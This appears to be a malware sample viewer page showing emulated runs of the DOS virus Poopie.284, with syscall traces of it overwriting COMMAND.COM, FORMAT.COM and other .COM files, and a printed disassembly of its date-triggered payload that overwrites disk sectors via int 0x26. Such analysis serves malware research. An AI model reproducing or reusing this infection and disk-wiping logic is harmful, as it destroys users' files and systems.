Sample viewer

vx.netlux.org/Virus.DOS.Poopie.284

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:40:08.840244357Z	14	PC: 12a8c \| Set default drive (Drive = 'C')
2018-12-17T22:40:08.848402922Z	47	PC: 12a90 \| Get disk transfer address
2018-12-17T22:40:08.84978108Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-17T22:40:08.851111085Z	78	PC: 12a68 \| Find first file
2018-12-17T22:40:08.857246966Z	61	PC: 12a71 \| Open file (Filename = 'COMMAND.COM')
2018-12-17T22:40:08.863035719Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-17T22:40:08.865992253Z	62	PC: 12a81 \| Close file
2018-12-17T22:40:09.21364797Z	79	PC: 12a5d \| Find next file
2018-12-17T22:40:09.216736565Z	59	PC: 12aca \| Change current directory
2018-12-17T22:40:09.223339553Z	78	PC: 12a68 \| Find first file
2018-12-17T22:40:09.233435604Z	61	PC: 12a71 \| Open file (Filename = 'EDIT.COM')
2018-12-17T22:40:09.240413942Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-17T22:40:09.245996777Z	62	PC: 12a81 \| Close file
2018-12-17T22:40:09.253694181Z	79	PC: 12a5d \| Find next file
2018-12-17T22:40:09.256623941Z	61	PC: 12a71 \| Open file (Filename = 'FORMAT.COM')
2018-12-17T22:40:09.263378607Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-17T22:40:09.27558322Z	62	PC: 12a81 \| Close file
2018-12-17T22:40:09.282573452Z	79	PC: 12a5d \| Find next file
2018-12-17T22:40:09.285595484Z	61	PC: 12a71 \| Open file (Filename = 'KEYB.COM')
2018-12-17T22:40:09.297911171Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-17T22:40:09.303399392Z	62	PC: 12a81 \| Close file
2018-12-17T22:40:09.310172395Z	42	PC: 12aec \| Get date 0x12aec: cmp dl, 0x1e 0x12aef: je 0x12b09 0x12af1: cmp al, 0 0x12af3: jg 0x12af9 0x12af5: push cs 0x12af6: call 0x22a4a 0x12af9: mov ds, word ptr cs:[0x1df] 0x12afe: mov dx, word ptr cs:[0x1e1] 0x12b03: mov ah, 0x1a 0x12b05: int 0x21 0x12b07: int 0x20 0x12b09: cli 0x12b0a: mov ah, 2 0x12b0c: cdq 0x12b0d: mov cx, 0x100 0x12b10: int 0x26 0x12b12: int 0x20 0x12b14: sub ch, byte ptr [0x4f43] 0x12b18: dec bp 0x12b19: add byte ptr [si + 0x44], bl
2018-12-17T22:40:09.313806511Z	26	PC: 12b07 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6934,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:43.109160908Z	14	PC: 12a8c \| Set default drive (Drive = 'C')
2018-12-25T12:00:43.111929882Z	47	PC: 12a90 \| Get disk transfer address
2018-12-25T12:00:43.113664761Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:00:43.115017775Z	78	PC: 12a68 \| Find first file
2018-12-25T12:00:43.123498662Z	61	PC: 12a71 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:00:43.136784182Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-25T12:00:43.140553344Z	62	PC: 12a81 \| Close file
2018-12-25T12:00:43.798522366Z	79	PC: 12a5d \| Find next file
2018-12-25T12:00:43.802405827Z	59	PC: 12aca \| Change current directory
2018-12-25T12:00:43.809182708Z	78	PC: 12a68 \| Find first file (See above)
2018-12-25T12:00:43.817404414Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.825103598Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.830593231Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.837111806Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:43.842222984Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.85105787Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.8603301Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.868196413Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:43.871694066Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.880652177Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.889216977Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.897423718Z	42	PC: 12aec \| Get date 0x12aec: cmp dl, 0x1e 0x12aef: je 0x12b09 0x12af1: cmp al, 0 0x12af3: jg 0x12af9 0x12af5: push cs 0x12af6: call 0x22a4a 0x12af9: mov ds, word ptr cs:[0x1df] 0x12afe: mov dx, word ptr cs:[0x1e1] 0x12b03: mov ah, 0x1a 0x12b05: int 0x21 0x12b07: int 0x20 0x12b09: cli 0x12b0a: mov ah, 2 0x12b0c: cdq 0x12b0d: mov cx, 0x100 0x12b10: int 0x26 0x12b12: int 0x20 0x12b14: sub ch, byte ptr [0x4f43] 0x12b18: dec bp 0x12b19: add byte ptr [si + 0x44], bl
2018-12-25T12:00:43.900182986Z	43	PC: 12a55 \| Set date
2018-12-25T12:00:43.905122719Z	26	PC: 12b07 \| Set disk transfer address

{"DateBased":true,"Day":30,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6934,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:43.321317706Z	14	PC: 12a8c \| Set default drive (Drive = 'C')
2018-12-25T12:00:43.323067397Z	47	PC: 12a90 \| Get disk transfer address
2018-12-25T12:00:43.324298563Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:00:43.325440202Z	78	PC: 12a68 \| Find first file
2018-12-25T12:00:43.335598051Z	61	PC: 12a71 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:00:43.342258757Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-25T12:00:43.345340855Z	62	PC: 12a81 \| Close file
2018-12-25T12:00:43.799454877Z	79	PC: 12a5d \| Find next file
2018-12-25T12:00:43.802711967Z	59	PC: 12aca \| Change current directory
2018-12-25T12:00:43.809623053Z	78	PC: 12a68 \| Find first file (See above)
2018-12-25T12:00:43.819238786Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.829672359Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.836703703Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.844527754Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:43.848634491Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.856172957Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.867149456Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.876950504Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:43.880965173Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:43.889893849Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:43.897101235Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:43.905053606Z	42	PC: 12aec \| Get date 0x12aec: cmp dl, 0x1e 0x12aef: je 0x12b09 0x12af1: cmp al, 0 0x12af3: jg 0x12af9 0x12af5: push cs 0x12af6: call 0x22a4a 0x12af9: mov ds, word ptr cs:[0x1df] 0x12afe: mov dx, word ptr cs:[0x1e1] 0x12b03: mov ah, 0x1a 0x12b05: int 0x21 0x12b07: int 0x20 0x12b09: cli 0x12b0a: mov ah, 2 0x12b0c: cdq 0x12b0d: mov cx, 0x100 0x12b10: int 0x26 0x12b12: int 0x20 0x12b14: sub ch, byte ptr [0x4f43] 0x12b18: dec bp 0x12b19: add byte ptr [si + 0x44], bl

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6934,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:00:44.842383563Z	14	PC: 12a8c \| Set default drive (Drive = 'C')
2018-12-25T12:00:44.844360803Z	47	PC: 12a90 \| Get disk transfer address
2018-12-25T12:00:44.846005203Z	26	PC: 12aa5 \| Set disk transfer address
2018-12-25T12:00:44.847583124Z	78	PC: 12a68 \| Find first file
2018-12-25T12:00:44.854476872Z	61	PC: 12a71 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T12:00:44.861241748Z	64	PC: 12a7d \| Write file or device (Write 284 bytes on handle 5)
2018-12-25T12:00:44.864879184Z	62	PC: 12a81 \| Close file
2018-12-25T12:00:45.206567318Z	79	PC: 12a5d \| Find next file
2018-12-25T12:00:45.209981679Z	59	PC: 12aca \| Change current directory
2018-12-25T12:00:45.216524935Z	78	PC: 12a68 \| Find first file (See above)
2018-12-25T12:00:45.227641229Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:45.236857034Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:45.243801098Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:45.253259458Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:45.257198053Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:45.263093306Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:45.269388948Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:45.277418761Z	79	PC: 12a5d \| Find next file (See above)
2018-12-25T12:00:45.280708679Z	61	PC: 12a71 \| Open file (See above)
2018-12-25T12:00:45.287962017Z	64	PC: 12a7d \| Write file or device (See above)
2018-12-25T12:00:45.295529888Z	62	PC: 12a81 \| Close file (See above)
2018-12-25T12:00:45.302909693Z	42	PC: 12aec \| Get date 0x12aec: cmp dl, 0x1e 0x12aef: je 0x12b09 0x12af1: cmp al, 0 0x12af3: jg 0x12af9 0x12af5: push cs 0x12af6: call 0x22a4a 0x12af9: mov ds, word ptr cs:[0x1df] 0x12afe: mov dx, word ptr cs:[0x1e1] 0x12b03: mov ah, 0x1a 0x12b05: int 0x21 0x12b07: int 0x20 0x12b09: cli 0x12b0a: mov ah, 2 0x12b0c: cdq 0x12b0d: mov cx, 0x100 0x12b10: int 0x26 0x12b12: int 0x20 0x12b14: sub ch, byte ptr [0x4f43] 0x12b18: dec bp 0x12b19: add byte ptr [si + 0x44], bl
2018-12-25T12:00:45.305194587Z	26	PC: 12b07 \| Set disk transfer address